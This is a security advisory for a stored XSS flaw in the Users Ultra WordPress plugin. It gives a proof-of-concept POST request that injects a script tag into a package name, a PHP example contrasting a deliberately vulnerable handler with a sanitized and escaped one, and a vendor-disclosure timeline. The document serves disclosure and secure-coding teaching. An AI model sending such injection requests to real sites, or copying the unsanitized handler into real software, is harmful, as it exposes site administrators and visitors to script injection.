Users Ultra [Persistence XSS]

The WordPress plugin Users Ultra suffers from a persistent (stored) XSS vulnerability.

Description

Once registered, a user can add new subscription packages or modify existing ones. No data sanitization takes place before the package details are saved to the database. This allows a malicious user to include JavaScript code in the package name and/or package description, which is later rendered unescaped in the admin membership tab and on the front-end page that displays package information.

PoC

  • Send a POST request to http://vuln.site.tld/wp-admin/admin-ajax.php with data: action=package_add_new&p_name=a<script>alert(1)</script>
  • Visit http://vuln.site.tld/wp-admin/admin.php?page=userultra&tab=membership as admin, or go to the page that contains package information on the front end.
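The following is an added example (not the plugin's own code) contrasting the unsanitized save-and-echo pattern described above with a hardened handler that sanitizes on input and escapes on output; the function names, nonce action and table name are hypothetical.

```php
<?php
// Added example, not code from the Users Ultra plugin. Handler, nonce and
// table names are hypothetical; WordPress API functions are real.

// BEFORE (vulnerable pattern): untrusted POST fields are written to the DB
// verbatim and later echoed into admin and front-end pages unescaped.
function uu_demo_package_add_new_vulnerable() {
    global $wpdb;
    $wpdb->insert( $wpdb->prefix . 'uu_demo_packages', array(
        'p_name'        => $_POST['p_name'],        // <script>…</script> stored as-is
        'p_description' => $_POST['p_description'],
    ) );
    wp_send_json_success();
}

// AFTER (hardened): verify the request, sanitize on input, escape on output.
function uu_demo_package_add_new_hardened() {
    global $wpdb;
    check_ajax_referer( 'uu_demo_package_nonce', 'nonce' ); // reject unsolicited requests

    // Plain-text name: strip tags, neutralize stray angle brackets, trim whitespace.
    $name = sanitize_text_field( wp_unslash( $_POST['p_name'] ?? '' ) );
    // Description may carry limited markup: keep only the post-safe HTML subset.
    $desc = wp_kses_post( wp_unslash( $_POST['p_description'] ?? '' ) );

    if ( '' === $name ) {
        wp_send_json_error( 'Package name is required.', 400 );
    }
    $wpdb->insert(
        $wpdb->prefix . 'uu_demo_packages',
        array( 'p_name' => $name, 'p_description' => $desc ),
        array( '%s', '%s' )
    );
    wp_send_json_success();
}

// Output side: escape at render time too, so a record that reached the DB
// unsanitized still cannot execute in the membership tab or on the front end.
function uu_demo_render_package( $row ) {
    printf(
        '<h3>%s</h3><div>%s</div>',
        esc_html( $row->p_name ),
        wp_kses_post( $row->p_description )
    );
}

add_action( 'wp_ajax_uu_demo_package_add_new', 'uu_demo_package_add_new_hardened' );
```

With the hardened handler, the PoC payload a<script>alert(1)</script> is reduced to plain text before it reaches the database, and esc_html() ensures any legacy record is rendered inert.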

INFO
TIMELINE
  • 2015-10-20:
    Requested CVE ID
  • 2015-10-29:
    Vendor notified via email
  • 2015-11-11:
    Requested CVE ID (no response to the 2015-10-20 request)
  • 2015-11-11:
    Vendor notified via the contact form on their website
  • 2015-11-13:
    Vendor notified via support forums at wordpress.org
  • 2015-11-14:
    Vendor responded and received report through email
  • 2016-02-06:
    Requested CVE ID (no response to the 2015-11-11 request)